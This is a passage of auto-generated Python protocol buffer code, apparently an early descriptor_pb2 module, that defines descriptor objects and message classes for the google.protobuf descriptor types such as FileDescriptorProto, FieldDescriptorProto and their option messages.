name='CORD', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='STRING_PIECE', index=2, number=2, options=None, type=None), ], containing_type=None, options=None, serialized_start=2926, serialized_end=2973, ) _FILEDESCRIPTORSET = descriptor.Descriptor( name='FileDescriptorSet', full_name='google.protobuf.FileDescriptorSet', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='file', full_name='google.protobuf.FileDescriptorSet.file', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=53, serialized_end=124, ) _FILEDESCRIPTORPROTO = descriptor.Descriptor( name='FileDescriptorProto', full_name='google.protobuf.FileDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.FileDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='package', full_name='google.protobuf.FileDescriptorProto.package', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='dependency', full_name='google.protobuf.FileDescriptorProto.dependency', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, 
options=None), descriptor.FieldDescriptor( name='message_type', full_name='google.protobuf.FileDescriptorProto.message_type', index=3, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='enum_type', full_name='google.protobuf.FileDescriptorProto.enum_type', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='service', full_name='google.protobuf.FileDescriptorProto.service', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension', full_name='google.protobuf.FileDescriptorProto.extension', index=6, number=7, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.FileDescriptorProto.options', index=7, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=127, serialized_end=475, ) _DESCRIPTORPROTO_EXTENSIONRANGE = descriptor.Descriptor( name='ExtensionRange', full_name='google.protobuf.DescriptorProto.ExtensionRange', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='start', 
full_name='google.protobuf.DescriptorProto.ExtensionRange.start', index=0, number=1, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='end', full_name='google.protobuf.DescriptorProto.ExtensionRange.end', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=859, serialized_end=903, ) _DESCRIPTORPROTO = descriptor.Descriptor( name='DescriptorProto', full_name='google.protobuf.DescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.DescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='field', full_name='google.protobuf.DescriptorProto.field', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension', full_name='google.protobuf.DescriptorProto.extension', index=2, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='nested_type', full_name='google.protobuf.DescriptorProto.nested_type', index=3, number=3, type=11, cpp_type=10, label=3, 
has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='enum_type', full_name='google.protobuf.DescriptorProto.enum_type', index=4, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension_range', full_name='google.protobuf.DescriptorProto.extension_range', index=5, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.DescriptorProto.options', index=6, number=7, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_DESCRIPTORPROTO_EXTENSIONRANGE, ], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=478, serialized_end=903, ) _FIELDDESCRIPTORPROTO = descriptor.Descriptor( name='FieldDescriptorProto', full_name='google.protobuf.FieldDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.FieldDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='number', full_name='google.protobuf.FieldDescriptorProto.number', index=1, number=3, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, 
enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='label', full_name='google.protobuf.FieldDescriptorProto.label', index=2, number=4, type=14, cpp_type=8, label=1, has_default_value=False, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='type', full_name='google.protobuf.FieldDescriptorProto.type', index=3, number=5, type=14, cpp_type=8, label=1, has_default_value=False, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='type_name', full_name='google.protobuf.FieldDescriptorProto.type_name', index=4, number=6, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extendee', full_name='google.protobuf.FieldDescriptorProto.extendee', index=5, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='default_value', full_name='google.protobuf.FieldDescriptorProto.default_value', index=6, number=7, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.FieldDescriptorProto.options', index=7, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, 
options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FIELDDESCRIPTORPROTO_TYPE, _FIELDDESCRIPTORPROTO_LABEL, ], options=None, is_extendable=False, extension_ranges=[], serialized_start=906, serialized_end=1566, ) _ENUMDESCRIPTORPROTO = descriptor.Descriptor( name='EnumDescriptorProto', full_name='google.protobuf.EnumDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.EnumDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='value', full_name='google.protobuf.EnumDescriptorProto.value', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.EnumDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1569, serialized_end=1709, ) _ENUMVALUEDESCRIPTORPROTO = descriptor.Descriptor( name='EnumValueDescriptorProto', full_name='google.protobuf.EnumValueDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.EnumValueDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, 
extension_scope=None, options=None), descriptor.FieldDescriptor( name='number', full_name='google.protobuf.EnumValueDescriptorProto.number', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.EnumValueDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1711, serialized_end=1819, ) _SERVICEDESCRIPTORPROTO = descriptor.Descriptor( name='ServiceDescriptorProto', full_name='google.protobuf.ServiceDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.ServiceDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='method', full_name='google.protobuf.ServiceDescriptorProto.method', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.ServiceDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], 
enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1822, serialized_end=1966, ) _METHODDESCRIPTORPROTO = descriptor.Descriptor( name='MethodDescriptorProto', full_name='google.protobuf.MethodDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.MethodDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='input_type', full_name='google.protobuf.MethodDescriptorProto.input_type', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='output_type', full_name='google.protobuf.MethodDescriptorProto.output_type', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.MethodDescriptorProto.options', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1968, serialized_end=2095, ) _FILEOPTIONS = descriptor.Descriptor( name='FileOptions', full_name='google.protobuf.FileOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='java_package', 
full_name='google.protobuf.FileOptions.java_package', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_outer_classname', full_name='google.protobuf.FileOptions.java_outer_classname', index=1, number=8, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_multiple_files', full_name='google.protobuf.FileOptions.java_multiple_files', index=2, number=10, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='optimize_for', full_name='google.protobuf.FileOptions.optimize_for', index=3, number=9, type=14, cpp_type=8, label=1, has_default_value=True, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='cc_generic_services', full_name='google.protobuf.FileOptions.cc_generic_services', index=4, number=16, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_generic_services', full_name='google.protobuf.FileOptions.java_generic_services', index=5, number=17, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='py_generic_services', 
full_name='google.protobuf.FileOptions.py_generic_services', index=6, number=18, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.FileOptions.uninterpreted_option', index=7, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FILEOPTIONS_OPTIMIZEMODE, ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2098, serialized_end=2518, ) _MESSAGEOPTIONS = descriptor.Descriptor( name='MessageOptions', full_name='google.protobuf.MessageOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='message_set_wire_format', full_name='google.protobuf.MessageOptions.message_set_wire_format', index=0, number=1, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='no_standard_descriptor_accessor', full_name='google.protobuf.MessageOptions.no_standard_descriptor_accessor', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.MessageOptions.uninterpreted_option', index=2, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ 
], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2521, serialized_end=2705, ) _FIELDOPTIONS = descriptor.Descriptor( name='FieldOptions', full_name='google.protobuf.FieldOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='ctype', full_name='google.protobuf.FieldOptions.ctype', index=0, number=1, type=14, cpp_type=8, label=1, has_default_value=True, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='packed', full_name='google.protobuf.FieldOptions.packed', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='deprecated', full_name='google.protobuf.FieldOptions.deprecated', index=2, number=3, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='experimental_map_key', full_name='google.protobuf.FieldOptions.experimental_map_key', index=3, number=9, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.FieldOptions.uninterpreted_option', index=4, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FIELDOPTIONS_CTYPE, ], options=None, 
is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2708, serialized_end=2984, ) _ENUMOPTIONS = descriptor.Descriptor( name='EnumOptions', full_name='google.protobuf.EnumOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.EnumOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2986, serialized_end=3079, ) _ENUMVALUEOPTIONS = descriptor.Descriptor( name='EnumValueOptions', full_name='google.protobuf.EnumValueOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.EnumValueOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3081, serialized_end=3179, ) _SERVICEOPTIONS = descriptor.Descriptor( name='ServiceOptions', full_name='google.protobuf.ServiceOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.ServiceOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], 
enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3181, serialized_end=3277, ) _METHODOPTIONS = descriptor.Descriptor( name='MethodOptions', full_name='google.protobuf.MethodOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.MethodOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3279, serialized_end=3374, ) _UNINTERPRETEDOPTION_NAMEPART = descriptor.Descriptor( name='NamePart', full_name='google.protobuf.UninterpretedOption.NamePart', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name_part', full_name='google.protobuf.UninterpretedOption.NamePart.name_part', index=0, number=1, type=9, cpp_type=9, label=2, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='is_extension', full_name='google.protobuf.UninterpretedOption.NamePart.is_extension', index=1, number=2, type=8, cpp_type=7, label=2, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=3587, serialized_end=3638, ) _UNINTERPRETEDOPTION = descriptor.Descriptor( name='UninterpretedOption', full_name='google.protobuf.UninterpretedOption', filename=None, file=DESCRIPTOR, containing_type=None, 
fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.UninterpretedOption.name', index=0, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='identifier_value', full_name='google.protobuf.UninterpretedOption.identifier_value', index=1, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='positive_int_value', full_name='google.protobuf.UninterpretedOption.positive_int_value', index=2, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='negative_int_value', full_name='google.protobuf.UninterpretedOption.negative_int_value', index=3, number=5, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='double_value', full_name='google.protobuf.UninterpretedOption.double_value', index=4, number=6, type=1, cpp_type=5, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='string_value', full_name='google.protobuf.UninterpretedOption.string_value', index=5, number=7, type=12, cpp_type=9, label=1, has_default_value=False, default_value="", message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], 
nested_types=[_UNINTERPRETEDOPTION_NAMEPART, ], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=3377, serialized_end=3638, ) _FILEDESCRIPTORSET.fields_by_name['file'].message_type = _FILEDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['message_type'].message_type = _DESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['enum_type'].message_type = _ENUMDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['service'].message_type = _SERVICEDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['extension'].message_type = _FIELDDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['options'].message_type = _FILEOPTIONS _DESCRIPTORPROTO_EXTENSIONRANGE.containing_type = _DESCRIPTORPROTO; _DESCRIPTORPROTO.fields_by_name['field'].message_type = _FIELDDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['extension'].message_type = _FIELDDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['nested_type'].message_type = _DESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['enum_type'].message_type = _ENUMDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['extension_range'].message_type = _DESCRIPTORPROTO_EXTENSIONRANGE _DESCRIPTORPROTO.fields_by_name['options'].message_type = _MESSAGEOPTIONS _FIELDDESCRIPTORPROTO.fields_by_name['label'].enum_type = _FIELDDESCRIPTORPROTO_LABEL _FIELDDESCRIPTORPROTO.fields_by_name['type'].enum_type = _FIELDDESCRIPTORPROTO_TYPE _FIELDDESCRIPTORPROTO.fields_by_name['options'].message_type = _FIELDOPTIONS _FIELDDESCRIPTORPROTO_TYPE.containing_type = _FIELDDESCRIPTORPROTO; _FIELDDESCRIPTORPROTO_LABEL.containing_type = _FIELDDESCRIPTORPROTO; _ENUMDESCRIPTORPROTO.fields_by_name['value'].message_type = _ENUMVALUEDESCRIPTORPROTO _ENUMDESCRIPTORPROTO.fields_by_name['options'].message_type = _ENUMOPTIONS _ENUMVALUEDESCRIPTORPROTO.fields_by_name['options'].message_type = _ENUMVALUEOPTIONS _SERVICEDESCRIPTORPROTO.fields_by_name['method'].message_type = _METHODDESCRIPTORPROTO _SERVICEDESCRIPTORPROTO.fields_by_name['options'].message_type 
= _SERVICEOPTIONS _METHODDESCRIPTORPROTO.fields_by_name['options'].message_type = _METHODOPTIONS _FILEOPTIONS.fields_by_name['optimize_for'].enum_type = _FILEOPTIONS_OPTIMIZEMODE _FILEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FILEOPTIONS_OPTIMIZEMODE.containing_type = _FILEOPTIONS; _MESSAGEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FIELDOPTIONS.fields_by_name['ctype'].enum_type = _FIELDOPTIONS_CTYPE _FIELDOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FIELDOPTIONS_CTYPE.containing_type = _FIELDOPTIONS; _ENUMOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _ENUMVALUEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _SERVICEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _METHODOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _UNINTERPRETEDOPTION_NAMEPART.containing_type = _UNINTERPRETEDOPTION; _UNINTERPRETEDOPTION.fields_by_name['name'].message_type = _UNINTERPRETEDOPTION_NAMEPART class FileDescriptorSet(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEDESCRIPTORSET # @@protoc_insertion_point(class_scope:google.protobuf.FileDescriptorSet) class FileDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.FileDescriptorProto) class DescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType class ExtensionRange(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _DESCRIPTORPROTO_EXTENSIONRANGE # @@protoc_insertion_point(class_scope:google.protobuf.DescriptorProto.ExtensionRange) DESCRIPTOR = _DESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.DescriptorProto) class 
FieldDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FIELDDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.FieldDescriptorProto) class EnumDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.EnumDescriptorProto) class EnumValueDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMVALUEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.EnumValueDescriptorProto) class ServiceDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _SERVICEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.ServiceDescriptorProto) class MethodDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _METHODDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.MethodDescriptorProto) class FileOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.FileOptions) class MessageOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _MESSAGEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.MessageOptions) class FieldOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FIELDOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.FieldOptions) class EnumOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.EnumOptions) class EnumValueOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMVALUEOPTIONS # 
